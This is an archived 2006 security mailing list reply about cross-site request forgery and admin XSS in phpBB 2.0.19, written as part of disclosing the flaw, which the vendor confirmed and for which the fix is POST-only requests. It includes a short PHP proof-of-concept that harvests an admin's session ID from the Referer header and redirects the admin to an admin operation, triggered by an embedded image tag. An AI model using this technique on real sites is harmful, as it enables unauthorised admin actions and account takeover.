lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri Feb  3 14:29:13 2006
From: max at jestsuper.pl (Maksymilian Arciemowicz)
Subject: phpBB 2.0.19 Cross Site Request Forgeries and
	XSSAdmin

> From: Berliner <berliner.does.not.mean.jelly.donut_at_googlemail.com> 
> 1. Basically all phpBB admin-side options do allow full HTML, including
> javascript. That is the intended behaviour, as there are legitimate uses.
> 
> phpBB does however check the Session ID before allowing the changes to go to
> the database.
> Your exploit needs a valid admin session key and you need to get the admin
> to visit the page (unless you happen to have a lot of luck with your IP)- be
> it by a link or a reflecting page. And even then, it will only work, when
> the admin has logged into the ACP prior to running into the trap.
> 

$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);

 if($sid[1]!=''){
 header("Location: ".$operation."&sid=".$sid[1]); 

if you have example <IMG SRC="http://SOME.SCRIPT.PHP"> and you send reffere... 
(testes in IE, Mozilla etc) that please check.. getenv('HTTP_REFERER')

The phpBB team was informed about this issues and they confirmed that these 
vulnerabilitie exists in phpBB 2.0.19. Solusion is use POST for all 
operation.

> 2. That is a general problem with all pages allowing of-site pictures. It
> has been discussed on the list before. Most of your examples won't work with
> phpBB, due to the missing Session ID in the links. 


-- 
pub   1024D/7FDF4CEE 2005-09-21
uid                  Maksymilian Arciemowicz (cXIb8O3) <max@...tsuper.pl>
sub   2048g/AE816DB6 2005-09-21

Powered by blists - more mailing lists